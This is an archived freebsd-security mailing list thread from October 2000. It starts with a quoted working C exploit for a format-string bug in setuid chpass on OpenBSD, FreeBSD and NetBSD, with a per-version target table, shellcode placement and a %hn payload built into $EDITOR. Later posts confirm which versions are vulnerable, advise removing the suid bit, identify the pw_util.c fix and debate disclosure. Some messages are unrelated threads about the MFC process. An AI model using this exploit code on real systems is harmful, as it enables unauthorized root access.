>    { "OpenBSD 2.7 i386 ", 141, 0xdfbfd25c, 0xdfbfdc32, ptmp_shellcode },
>    { "OpenBSD 2.6 i386 ", 149, 0xdfbfd224, 0xdfbfdc1a, ptmp_shellcode },
>    { "OpenBSD 2.5 1999/08/06 ", 161, 0xefbfd1a0, 0xefbfdbd6, ptmp_shellcode },
>    { "OpenBSD 2.5 1998/05/28 ", 121, 0xefbfd2b0, 0xefbfdc6e, ptmp_shellcode },
>    { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, bsd_shellcode },
>    { "FreeBSD 3.5-RELEASE ", 135, 0x804fa58, 0xbfbfdcac, bsd_shellcode },
>    { "FreeBSD 3.4-RELEASE ", 131, 0x804f988, 0xbfbfdcd0, bsd_shellcode },
>    { "NetBSD 1.4.2 ", 132, 0xbfbfd314, 0xbfbfdc36, bsd_shellcode },
>    { NULL, 0, 0, 0, NULL }
>};
>
>char jmpcode[129];
>char fmt_string[1000];
>
>char *args[] = { "chpass", NULL };
>char *envs[] = { jmpcode, fmt_string, NULL };  /* both payloads travel in the environment */
>
>void usage(char *name)
>{
>    printf("%s \n"
>           "1 - OpenBSD 2.7 i386\n"
>           "2 - OpenBSD 2.6 i386\n"
>           "3 - OpenBSD 2.5 1999/08/06\n"
>           "4 - OpenBSD 2.5 1998/05/28\n"
>           "5 - FreeBSD 4.0-RELEASE\n"
>           "6 - FreeBSD 3.5-RELEASE\n"
>           "7 - FreeBSD 3.4-RELEASE\n"
>           "8 - NetBSD 1.4.2\n", name);
>    exit(1);
>}
>
>int main(int argc, char *argv[])
>{
>    char *p;
>    int x, len = 0;
>    struct platform *target;
>    unsigned short low, high;
>    unsigned long shell_addr[2], dest_addr[2];
>
>    if (argc != 2)
>        usage(argv[0]);
>
>    x = atoi(argv[1]) - 1;
>    if (x > ((sizeof(targets)-sizeof(struct platform)) / sizeof(struct platform)) - 1 || x < 0)
>        usage(argv[0]);
>
>    target = &targets[x];
>
>    /* NOP sled with the shellcode at its end */
>    memset(jmpcode, 0x90, sizeof(jmpcode));
>    strcpy(jmpcode + sizeof(jmpcode) - strlen(target->shellcode),
>           target->shellcode);
>
>    /* $EDITOR is the format string: count %8x's pop stack words up to the
>       addresses planted in jmpcode; each %<width>d/%hn pair then writes one
>       16-bit half of shell_addr to one of those addresses */
>    strcat(fmt_string, "EDITOR=");
>    for (x = 0; x < target->count; x++) {
>        strcat(fmt_string, "%8x");
>        len += 8;
>    }
>
>    shell_addr[0] = (target->shell_addr & 0xffff0000) >> 16;
>    shell_addr[1] = target->shell_addr & 0xffff;
>
>    if (shell_addr[1] > shell_addr[0]) {
>        dest_addr[0] = target->dest_addr+2;
>        dest_addr[1] = target->dest_addr;
>        low = shell_addr[0] - len;
>        high = shell_addr[1] - low - len;
>    } else {
>        dest_addr[0] = target->dest_addr;
>        dest_addr[1] = target->dest_addr+2;
>        low = shell_addr[1] - len;
>        high = shell_addr[0] - low - len;
>    }
>
>    /* layout consumed by the tail of the format: pad, dest0, pad, dest1 */
>    *(long *)&jmpcode[1] = 0x11111111;
>    *(long *)&jmpcode[5] = dest_addr[0];
>    *(long *)&jmpcode[9] = 0x11111111;
>    *(long *)&jmpcode[13] = dest_addr[1];
>
>    p = fmt_string + strlen(fmt_string);
>    sprintf(p, "%%%dd%%hn%%%dd%%hn", low, high);
>
>    execve("/usr/bin/chpass", args, envs);
>    perror("execve");
>}
-------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:15:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 6248337B66C for ; Tue, 3 Oct 2000 22:15:35 -0700 (PDT) Received: (qmail 35521 invoked by uid 1000); 4 Oct 2000 05:16:45 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:16:45 -0000 Date: Wed, 4 Oct 2000 00:16:45 -0500 (CDT) From: Mike Silbersack To: security@freebsd.org Subject: BSD chpass (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those not subscribed to bugtraq, it's time to remove the suid bit on chpass. 
Mike "Silby" Silbersack ---------- Forwarded message ---------- Date: Wed, 4 Oct 2000 02:45:48 +1000 From: caddis To: BUGTRAQ@SECURITYFOCUS.COM Subject: BSD chpass /* * TESO BSD chpass exploit - caddis * * greets: #!teso, #!w00w00, #hert!, #ozsecurity, #plus613 * */ #include struct platform targets[9] = { { "OpenBSD 2.7 i386 ", 141, 0xdfbfd25c, 0xdfbfdc32, ptmp_shellcode }, { "OpenBSD 2.6 i386 ", 149, 0xdfbfd224, 0xdfbfdc1a, ptmp_shellcode }, { "OpenBSD 2.5 1999/08/06 ", 161, 0xefbfd1a0, 0xefbfdbd6, ptmp_shellcode }, { "OpenBSD 2.5 1998/05/28 ", 121, 0xefbfd2b0, 0xefbfdc6e, ptmp_shellcode }, { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, bsd_shellcode }, { "FreeBSD 3.5-RELEASE ", 135, 0x804fa58, 0xbfbfdcac, bsd_shellcode }, { "FreeBSD 3.4-RELEASE ", 131, 0x804f988, 0xbfbfdcd0, bsd_shellcode }, { "NetBSD 1.4.2 ", 132, 0xbfbfd314, 0xbfbfdc36, bsd_shellcode }, { NULL, 0, 0, 0, NULL } }; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:16:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 31BBE37B502 for ; Tue, 3 Oct 2000 22:16:55 -0700 (PDT) Received: (qmail 35532 invoked by uid 1000); 4 Oct 2000 05:18:04 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:18:04 -0000 Date: Wed, 4 Oct 2000 00:18:04 -0500 (CDT) From: Mike Silbersack To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: Re: Fwd: BSD chpass In-Reply-To: <4.2.2.20001004011210.035225e0@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Mike Tancsa wrote: > OK, here is a nasty bugtraq posting :-( > > ---Mike Doh, your mail arrived while I jumped out to a shell and back in to pine. 
Sorry for the dupe alert. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:17: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id EE6FA37B66C for ; Tue, 3 Oct 2000 22:16:58 -0700 (PDT) Received: (qmail 79741 invoked by uid 1000); 4 Oct 2000 05:16:53 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:16:53 -0000 Date: Wed, 4 Oct 2000 01:16:50 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: Re: Fwd: BSD chpass In-Reply-To: <4.2.2.20001004011210.035225e0@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be vulnerable in a method outside the scope of the posted exploit. 
I just found out about this 5 minutes and ran to turn off the suid bit :P On Wed, 4 Oct 2000, Mike Tancsa wrote: : Date: Wed, 4 Oct 2000 01:12:59 -0400 : From: Mike Tancsa : To: freebsd-security@freebsd.org : Subject: Fwd: BSD chpass : : : OK, here is a nasty bugtraq posting :-( : : ---Mike : : : >Approved-By: aleph1@SECURITYFOCUS.COM : >Delivered-To: bugtraq@lists.securityfocus.com : >Delivered-To: bugtraq@securityfocus.com : >User-Agent: Mutt/1.2i : >Date: Wed, 4 Oct 2000 02:45:48 +1000 : >Reply-To: caddis : >Sender: Bugtraq List : >From: caddis : >Subject: BSD chpass : >To: BUGTRAQ@SECURITYFOCUS.COM : > : >[exploit source snipped: quoted verbatim from the forward in Mike Tancsa's message above] : : -------------------------------------------------------------------- : Mike Tancsa, tel +1 519 651 3400 : Network Administration, mike@sentex.net : Sentex Communications www.sentex.net : Cambridge, Ontario Canada www.sentex.net/mike : : : : To Unsubscribe: send mail to majordomo@FreeBSD.org : with "unsubscribe freebsd-security" in the body of the message : * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.3 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE52r1FdMMtMcA1U5ARAnXAAKDhwrEZYJf6/88mIaFOgPFVgGl3SACfTWwx L1I064VgjK87cIBOI3FonT8= =Jzcy -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:23:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 4DBBE37B502 for ; Tue, 3 Oct 2000 22:23:09 -0700 (PDT) Received: (qmail 35608 invoked by uid 1000); 4 Oct 2000 05:24:19 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:24:19 -0000 Date: Wed, 4 Oct 2000 00:24:19 -0500 (CDT) From: Mike Silbersack To: Matt Heckaman Cc: Mike Tancsa , freebsd-security@freebsd.org Subject: Re: Fwd: BSD chpass In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Matt Heckaman wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on > my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be > vulnerable in a method outside the scope of the posted exploit. 
> I just
> found out about this 5 minutes and ran to turn off the suid bit :P

Unless the nsswitch changes fixed it, 4.1.1 should still be vulnerable -
there are no messages in the cvs logs for chpass indicating any
security-related changes recently. (For both FreeBSD and OpenBSD.)

Looks like the guy didn't want to talk to vendors before posting.

Mike "Silby" Silbersack

From owner-freebsd-security Tue Oct 3 22:38:59 2000
Delivered-To: freebsd-security@freebsd.org
Received: from netplex.com.au (adsl-63-207-30-186.dsl.snfc21.pacbell.net [63.207.30.186]) by hub.freebsd.org (Postfix) with ESMTP id 9EB3637B502 for ; Tue, 3 Oct 2000 22:38:56 -0700 (PDT)
Received: from netplex.com.au (peter@localhost [127.0.0.1]) by netplex.com.au (8.11.0/8.9.3) with ESMTP id e945cfH18681; Tue, 3 Oct 2000 22:38:41 -0700 (PDT) (envelope-from peter@netplex.com.au)
Message-Id: <200010040538.e945cfH18681@netplex.com.au>
X-Mailer: exmh version 2.1.1 10/15/1999
To: Mike Silbersack
Cc: Matt Heckaman , Mike Tancsa , freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: BSD chpass
In-Reply-To:
Date: Tue, 03 Oct 2000 22:38:41 -0700
From: Peter Wemm
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

4.1-RELEASE and 4.1.1-RELEASE are not vulnerable to this. The following change in usr.sbin/vipw/pw_util.c fixed the problem:

revision 1.18
date: 2000/07/12 00:49:40; author: kris; state: Exp; lines: +2 -2
Don't call warn() without a format string.

and it was MFC'ed prior to 4.1-REL:

revision 1.17.2.1
date: 2000/07/20 10:35:27; author: kris; state: Exp; lines: +1 -1
MFC: Don't call vfprintf-like functions without a format string.

It just goes to show how an innocent quirk can break things. (You can verify that this was the overflow by reverting the change and then the exploit either works or causes a segfault)

Anybody know about the openbsd-specific ptmp bug? Does that affect us too?

Mike Silbersack wrote:
>
> On Wed, 4 Oct 2000, Matt Heckaman wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on
> > my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be
> > vulnerable in a method outside the scope of the posted exploit. I just
> > found out about this 5 minutes and ran to turn off the suid bit :P
>
> Unless the nsswitch changes fixed it, 4.1.1 should still be vulnerable -
> there are no messages in the cvs logs for chpass indicating any
> security-related changes recently. (For both FreeBSD and OpenBSD.)
>
> Looks like the guy didn't want to talk to vendors before posting.
>
> Mike "Silby" Silbersack

Cheers,
-Peter
--
Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au
"All of this is for nothing if we don't go to the stars" - JMS/B5

From owner-freebsd-security Tue Oct 3 22:44:27 2000
Delivered-To: freebsd-security@freebsd.org
Received: from peach.ocn.ne.jp (peach.ocn.ne.jp [210.145.254.87]) by hub.freebsd.org (Postfix) with ESMTP id 4241337B66C; Tue, 3 Oct 2000 22:44:22 -0700 (PDT)
Received: from newsguy.com (p06-dn01kiryunisiki.gunma.ocn.ne.jp [211.0.245.7]) by peach.ocn.ne.jp (8.9.1a/OCN/) with ESMTP id OAA08696; Wed, 4 Oct 2000 14:44:08 +0900 (JST)
Message-ID: <39DAC368.C6C213B7@newsguy.com>
Date: Wed, 04 Oct 2000 14:43:04 +0900
From: "Daniel C.
Sobral"
X-Mailer: Mozilla 4.7 [en] (Win98; I)
X-Accept-Language: en,pt-BR
MIME-Version: 1.0
To: Kris Kennaway
Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: cvs commit: src/usr.bin/finger finger.c
References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <39DA182C.C70ED553@originative.co.uk> <200010031800.MAA27859@harmony.village.org> <20001003162720.D51546@freefall.freebsd.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway wrote:
>
> I think a formal MFC process may be too stifling, unless we have a
> VERY responsive MFC team. Consider that we don't want the same thing
> to happen as did with 3.x, where 4.0-CURRENT was allowed to diverge so
> much that merging bugfixes became difficult.

I don't think the comparison is appropriate. The divergence between 3.x and 4.x came at the very beginning of 3.x's life, and it was not merged back because it was too big a change.

--
Daniel C. Sobral (8-DCS)
dcs@newsguy.com
dcs@freebsd.org
capo@linux.bsdconspiracy.net

the ants all left because mtn.
dew is sold out again

From owner-freebsd-security Tue Oct 3 23: 8:45 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 9CE1237B502 for ; Tue, 3 Oct 2000 23:08:42 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id AAA27863; Wed, 4 Oct 2000 00:08:26 -0600 (MDT)
Message-Id: <4.3.2.7.2.20001003235232.0499b980@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Wed, 04 Oct 2000 00:08:23 -0600
To: Matt Heckaman , Mike Tancsa
From: Brett Glass
Subject: Re: Fwd: BSD chpass
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
References: <4.2.2.20001004011210.035225e0@mail.sentex.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

4.1-RELEASE and 4.1-STABLE do not seem to be vulnerable because the format string bug upon which the exploit relies is gone. (It took me awhile to hunt this one down. It was in /src/usr.sbin/vipw/pw_util.c -- not in the directory with the source for chpass itself.)

4.0-RELEASE and all earlier releases I've tested seem to be vulnerable.

--Brett

At 11:16 PM 10/3/2000, Matt Heckaman wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on
>my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be
>vulnerable in a method outside the scope of the posted exploit.
I just >found out about this 5 minutes and ran to turn off the suid bit :P To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:11:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.ninth-circle.org (lucifer.bart.nl [194.158.168.74]) by hub.freebsd.org (Postfix) with ESMTP id E1E7437B502; Tue, 3 Oct 2000 23:11:06 -0700 (PDT) Received: (from asmodai@localhost) by lucifer.ninth-circle.org (8.11.0/8.11.0) id e946ApA97021; Wed, 4 Oct 2000 08:10:51 +0200 (CEST) (envelope-from asmodai) Date: Wed, 4 Oct 2000 08:10:51 +0200 From: Jeroen Ruigrok van der Werven To: Brett Glass Cc: Bill Fumerola , Warner Losh , Paul Richards , cvs-committers@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: STABLE support team [Was: cvs commit: src/usr.bin/finger finger.c] Message-ID: <20001004081051.C96772@lucifer.bart.nl> References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <200010031800.MAA27859@harmony.village.org> <4.3.2.7.2.20001003125150.04c7f3f0@localhost> <20001003163020.B38472@jade.chc-chimes.com> <4.3.2.7.2.20001003161654.00de6b60@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001003161654.00de6b60@localhost>; from brett@lariat.org on Tue, Oct 03, 2000 at 04:27:43PM -0600 Organisation: VIA Net.Works The Netherlands Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -On [20001004 00:30], Brett Glass (brett@lariat.org) wrote: >As you know, the purpose of 4.1.1 was to roll cryptography into -STABLE in the >wake of the expiration of the RSA patent. 
A good thing, of course, but there >are still some glitches in 4.1.1 that I expect will be fixed by 4.2. Oh? I fail to see any PR's raised on the glitches so that they can actually be archived, looked upon and examined and fixed. That's common practice for everyone, or like Bill Paul used to say: I can't see your box from over here. -- Jeroen Ruigrok van der Werven Network- and systemadministrator VIA Net.Works The Netherlands BSD: Technical excellence at its best http://www.via-net-works.nl Grant me the serenity to accept the things I cannot change, courage to change the things I can, and wisdom to know the difference... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:14:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.ninth-circle.org (lucifer.bart.nl [194.158.168.74]) by hub.freebsd.org (Postfix) with ESMTP id 62B5037B502; Tue, 3 Oct 2000 23:14:13 -0700 (PDT) Received: (from asmodai@localhost) by lucifer.ninth-circle.org (8.11.0/8.11.0) id e946DuP97032; Wed, 4 Oct 2000 08:13:56 +0200 (CEST) (envelope-from asmodai) Date: Wed, 4 Oct 2000 08:13:56 +0200 From: Jeroen Ruigrok van der Werven To: Brett Glass Cc: Alfred Perlstein , Peter Wemm , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004081356.D96772@lucifer.bart.nl> References: <200010032326.e93NQ7H17213@netplex.com.au> <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> <20001003164236.Q27736@fw.wintelcom.net> <4.3.2.7.2.20001003175130.043dc4c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001003175130.043dc4c0@localhost>; from brett@lariat.org on Tue, Oct 03, 2000 at 05:55:55PM -0600 Organisation: VIA Net.Works The Netherlands Sender: 
owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -On [20001004 02:00], Brett Glass (brett@lariat.org) wrote: [differences between userland and kernel MFC's] >What about root compromises in userland -- e.g. in setuid apps, daemons >that run (or at least start) as root, etc.? Security fixes are always special cases. -- Jeroen Ruigrok van der Werven Network- and systemadministrator VIA Net.Works The Netherlands BSD: Technical excellence at its best http://www.via-net-works.nl Grant me the serenity to accept the things I cannot change, courage to change the things I can, and wisdom to know the difference... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:16:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.ninth-circle.org (lucifer.bart.nl [194.158.168.74]) by hub.freebsd.org (Postfix) with ESMTP id B169E37B502; Tue, 3 Oct 2000 23:16:17 -0700 (PDT) Received: (from asmodai@localhost) by lucifer.ninth-circle.org (8.11.0/8.11.0) id e946G4v97096; Wed, 4 Oct 2000 08:16:04 +0200 (CEST) (envelope-from asmodai) Date: Wed, 4 Oct 2000 08:16:04 +0200 From: Jeroen Ruigrok van der Werven To: Jordan Hubbard Cc: Paul Richards , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004081604.E96772@lucifer.bart.nl> References: <84077.970617261@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <84077.970617261@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Tue, Oct 03, 2000 at 04:54:21PM -0700 Organisation: VIA Net.Works The Netherlands Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -On [20001004 01:55], Jordan Hubbard 
(jkh@winston.osd.bsdi.com) wrote: >> I think you're looking at it the wrong way around. The stable team >> wouldn't be putting in a lot of hours reviewing stable commits. > >Fine, change "reviewing" to "doing" and my original point still holds. >How many hours are you and the other developers who volunteer willing >to commit to this? That's all I want to know and it's a reasonable >question to ask. I did a lot of MFC's over the last months with some weeks more productivity than others depending on the amount of projects I am involved in at work. And I will continue to regularly review the diffs between 3 and 4, 4 and 5, and 3 and 5. -- Jeroen Ruigrok van der Werven Network- and systemadministrator VIA Net.Works The Netherlands BSD: Technical excellence at its best http://www.via-net-works.nl Grant me the serenity to accept the things I cannot change, courage to change the things I can, and wisdom to know the difference... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:18:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.flexabit.net (ns1.flexabit.net [64.198.230.130]) by hub.freebsd.org (Postfix) with ESMTP id AFEB137B503 for ; Tue, 3 Oct 2000 23:18:23 -0700 (PDT) Received: from LIQUID.uiuc.edu (wakeland-103.flexabit.net [64.198.239.103]) by ns1.flexabit.net (Postfix) with ESMTP id B937AFA99; Wed, 4 Oct 2000 01:18:17 -0500 (CDT) Message-Id: <5.0.0.25.2.20001004011552.02eee900@students.uiuc.edu> X-Sender: yardley@students.uiuc.edu X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Wed, 04 Oct 2000 01:18:25 -0500 To: Mike Silbersack From: Tim Yardley Subject: Re: Fwd: BSD chpass Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I would just like to point out that it was posted 
to bugtraq because the original work in progress exploit was leaked. Vendors are always notified once you have something that works, and caddis is no exception to this rule. The leak caused this bug to be posted before it was meant to be. If you do notice, obsd posted an advisory right after, which does show that at least some people were in the "know".

/tmy

At 12:24 AM 10/4/2000, Mike Silbersack wrote:
>Looks like the guy didn't want to talk to vendors before posting.
>
>Mike "Silby" Silbersack

--
Diving into infinity my consciousness expands in inverse proportion to my distance from singularity
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- - --------------+
| Tim Yardley (yardley@uiuc.edu) | http://www.students.uiuc.edu/~yardley/
+-------- ------- ------ ----- ---- --- -- --- ------ ------- -------- - --------------+

From owner-freebsd-security Tue Oct 3 23:41:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 3C24137B502; Tue, 3 Oct 2000 23:41:07 -0700 (PDT)
Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id BAA28639; Wed, 4 Oct 2000 01:40:53 -0500 (CDT) (envelope-from jeff-ml@mountin.net)
Received: from dial-70.max1.wa.cyberlynk.net(207.227.118.70) by peak.mountin.net via smap (V1.3) id sma028633; Wed Oct 4 01:40:35 2000
Message-Id: <4.3.2.20001004010120.00b1cb50@207.227.119.2>
X-Sender: jeff-ml@207.227.119.2
X-Mailer: QUALCOMM Windows Eudora Version 4.3
Date: Wed, 04 Oct 2000 01:35:21 -0500
To: "Daniel C. Sobral" , Kris Kennaway
From: "Jeffrey J.
Mountin" Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <39DAC368.C6C213B7@newsguy.com> References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <39DA182C.C70ED553@originative.co.uk> <200010031800.MAA27859@harmony.village.org> <20001003162720.D51546@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:43 PM 10/4/00 +0900, Daniel C. Sobral wrote: >Kris Kennaway wrote: > > > > I think a formal MFC process may be too stifling, unless we have a > > VERY responsive MFC team. Consider that we don't want the same thing > > to happen as did with 3.x, where 4.0-CURRENT was allowed to diverge so > > much that merging bugfixes became difficult. > >I don't think the comparision is appropriate. The divergence between 3.x >and 4.x came at the very beginning of 3.x's life, and it was not merged >back because it was too big a change. Aren't the SMP changes in -current similar and will reduce the amount of code that can be backported to -stable with relative ease. "Allowed to diverge" smacks of halting progress and some changes are painful. I'm not one to get into detail or give examples, which would be better suited on -arch and -hackers, but will say that divergence in userland is more likely to slow/stunt/make a PITA out of MFC'ing than kernel changes. Don't think the pain of change can be avoided, but in general some do put more thought into changes than others and take the time to consider if -stable can benefit. Simply are the gains worth the cost. 
Can't really come up with a blanket to wrap the ideas here simply. Can say that after the SMP changes in -current the ratio of -current to -stable commits dropped. In and of itself that doesn't say much. There are quite a few commits to -stable (even since 4.1.1) and even 3.x and lest we forget that -current is the development branch.

Some things just have to wait. I recall waiting for 3.x and SMP, many improvements again in 4.x, and am waiting once more (not sure for what just yet, but I'm waaay behind with my -current mail). Hardly expect more than some of the bigger changes (if any) will make it back from -current to -stable.

Almost seems like to solve the divergence issue we must merge -current and -stable, making the latter a well tested snapshot of the former. Not one of them, but there were cases for a production environment where -current was needed. Prior to 4.0R NFS was probably the best example.

It is also quite possible that the divergence and Jordan's observation that it's hard to get -current developers to MFC, that with the fewer changes filtering back that more time was spent working on the "new and improved" to make 4.0 such an excellent release. Just may not be possible to have our cake and eat it too.

Personally I think endless discussions that go nowhere have been hurting the amount of committing. Recently the amount of commits seems to have slowed quite a bit. This may be a good thing if the developers are wading through their mail. Perhaps those of us that don't code should be a bit more quiet. This thread is an exception, but -security has gone to pot and yes this is CC'd to -security, but no longer belongs there. Nor does its spin-off, which I plan to wade through in the hope of a glimmer.
